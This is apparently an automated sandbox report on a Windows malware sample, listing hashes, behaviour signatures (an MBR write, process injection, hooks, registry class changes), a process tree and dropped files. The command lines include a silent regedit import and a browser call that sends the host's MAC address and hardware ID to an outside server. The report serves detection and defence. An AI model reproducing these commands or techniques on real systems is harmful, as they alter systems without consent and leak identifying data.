Analysis

max time kernel: 117s
max time network: 128s
platform: windows7_x64
resource: win7-20231129-en
resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
submitted: 20-04-2024 06:30
Static task: static1

Behavioral task: behavioral1
  Sample: fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe
  Resource: win7-20231129-en

Behavioral task: behavioral2
  Sample: fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe
  Resource: win10v2004-20240412-en
General

Target: fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe
Size: 60KB
MD5: fc239744bad8d8efbe1ff2db4efc21bd
SHA1: 6ebecbe46a6deb33c113a3e90a5e853b264d730b
SHA256: eb046e06154fee919638727f5d53ee724da02a9db31a14fc6db9d917de208de4
SHA512: 166805c0e462589797e6ad6fe0b69a9cf437a2c1051a93537d5ecfc1cf493b7156e6d65b2ebe1d2eef523f2a2fa5677a8d9bef2b79ecd39da2b78eae9ab40286
SSDEEP: 768:VcYzYhaPMn84kg57lCeq1wonniiJMbO163IAVzP4/qn6MIMJy5rd/D:S0YhaPMaolChf12IAZP6qnet5rd7
Signatures

Writes to the Master Boot Record (MBR) (1 TTP, 1 IoC)
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes: fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe
  description: File opened for modification
  ioc: \??\PhysicalDrive0
  process: fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe
Modifies Internet Explorer settings
Processes: iexplore.exe, IEXPLORE.EXE
All keys below are under \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer, written as IE\ for brevity.
  Key created       IE\IntelliForms                                   iexplore.exe
  Key created       IE\InternetRegistry                               iexplore.exe
  Key created       IE\LowRegistry\DOMStorage                         iexplore.exe
  Key created       IE\LowRegistry\DontShowMeThisDialogAgain          iexplore.exe
  Key created       IE\PageSetup                                      iexplore.exe
  Key created       IE\Zoom                                           iexplore.exe
  Set value (int)   IE\Recovery\AdminActive\{6B30F221-FEDF-11EE-9066-F6F8CE09FCD4} = "0"   iexplore.exe
  Key created       IE\GPU                                            iexplore.exe
  Set value (int)   IE\Recovery\PendingRecovery\AdminActive = "0"     iexplore.exe
  Key created       IE\Main\WindowsSearch                             iexplore.exe
  Set value (int)   IE\Recovery\PendingRecovery\AdminActive = "1"     iexplore.exe
  Key created       IE\Toolbar                                        iexplore.exe
  Key created       IE\Toolbar\WebBrowser                             iexplore.exe
  Set value (int)   IE\Main\CompatibilityFlags = "0"                  iexplore.exe
  Key created       IE\Recovery\AdminActive                           iexplore.exe
  Set value (str)   IE\Main\WindowsSearch\Version = "WS not running"  iexplore.exe
  Set value (data)  IE\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000   iexplore.exe
  Key created       IE\Recovery\PendingRecovery                       iexplore.exe
  Key created       IE\BrowserEmulation\LowMic                        iexplore.exe
  Key created       IE\IETld\LowMic                                   iexplore.exe
  Key created       IE\LowRegistry                                    iexplore.exe
  Key created       IE\Main                                           IEXPLORE.EXE
  Set value (str)   IE\Main\FullScreen = "no"                         iexplore.exe
  Key created       IE\Main                                           iexplore.exe
Modifies registry class (14 IoCs)
Processes: regedit.exe
All keys below are under \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open, written as OPEN\ for brevity.
  Key created       OPEN                                                         regedit.exe
  Set value (str)   OPEN\ddeexec\ifexec\ = "[]"                                  regedit.exe
  Set value (str)   OPEN\command\ = "%SystemRoot%\\Explorer.exe /idlist,%I,%L"   regedit.exe
  Key created       OPEN\ddeexec\application                                     regedit.exe
  Set value (str)   OPEN\ddeexec\application\ = "Folders"                        regedit.exe
  Set value (str)   OPEN\ddeexec\topic\ = "AppProperties"                        regedit.exe
  Key created       OPEN\ddeexec                                                 regedit.exe
  Set value (str)   OPEN\ddeexec\ = "[ViewFolder(\"%l\", %I, %S)]"               regedit.exe
  Set value (str)   OPEN\ddeexec\NoActivateHandler                               regedit.exe
  Key created       OPEN\ddeexec\ifexec                                          regedit.exe
  Key created       OPEN\ddeexec\topic                                           regedit.exe
  Set value (int)   OPEN\BrowserFlags = "16"                                     regedit.exe
  Set value (int)   OPEN\ExplorerFlags = "18"                                    regedit.exe
  Key created       OPEN\command                                                 regedit.exe
Runs .reg file with regedit (1 IoC)
Processes: regedit.exe
  pid 3068  regedit.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)
Processes: fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe
  pid 1392  fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe

Suspicious use of FindShellTrayWindow (1 IoC)
Processes: iexplore.exe
  pid 1644  iexplore.exe

Suspicious use of SetWindowsHookEx (7 IoCs)
Processes: fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe, iexplore.exe, IEXPLORE.EXE
  pid 1392  fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe  (1 hit)
  pid 1644  iexplore.exe  (2 hits)
  pid 2788  IEXPLORE.EXE  (4 hits)

Suspicious use of WriteProcessMemory (16 IoCs)
Processes: fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe, cmd.exe, iexplore.exe
  PID 1392 wrote to memory of 2192  (fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe -> cmd.exe)  4 times
  PID 1392 wrote to memory of 1644  (fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe -> iexplore.exe)  4 times
  PID 2192 wrote to memory of 3068  (cmd.exe -> regedit.exe)  4 times
  PID 1644 wrote to memory of 2788  (iexplore.exe -> IEXPLORE.EXE)  4 times
Processes

1. C:\Users\Admin\AppData\Local\Temp\fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe"
   - Writes to the Master Boot Record (MBR)
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\SysWOW64\regedit.exe
         Command line: regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
         - Modifies registry class
         - Runs .reg file with regedit

   2. C:\Program Files\Internet Explorer\iexplore.exe
      Command line: "C:\Program Files\Internet Explorer\iexplore.exe" http://union.wanwan.cc/Stat.ashx?Mac=F6F8CE09FCD4&Hard=QM00013&ClientType=Home&Process=29&UserID=0040&Authen=844-465
      - Modifies Internet Explorer settings
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

      3. C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
         Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1644 CREDAT:275457 /prefetch:2
         - Modifies Internet Explorer settings
         - Suspicious use of SetWindowsHookEx
Downloads

C:\Users\Admin\AppData\Local\Temp\getback.reg
  Filesize: 1KB
  MD5: 626e2d76f5c328d57a3eff6a7f94d129
  SHA1: 210fd33fa005775b30a8fd40a065a2e788934216
  SHA256: 5d9ae4b62924d6da9c35305bfd0d61c893767b7113f8b2f239da02057f8bee6e
  SHA512: 629290bd5791a42327b3b70a68609c6b0b9114365be8579553e01e6cbc98996c0fab475b88c0dd80d34dcc325453401c6cce26fb70ed67a9cb08271a07fd85a1

memory/1392-0-0x0000000000400000-0x000000000040F000-memory.dmp
  Filesize: 60KB

memory/1392-27-0x0000000000400000-0x000000000040F000-memory.dmp
  Filesize: 60KB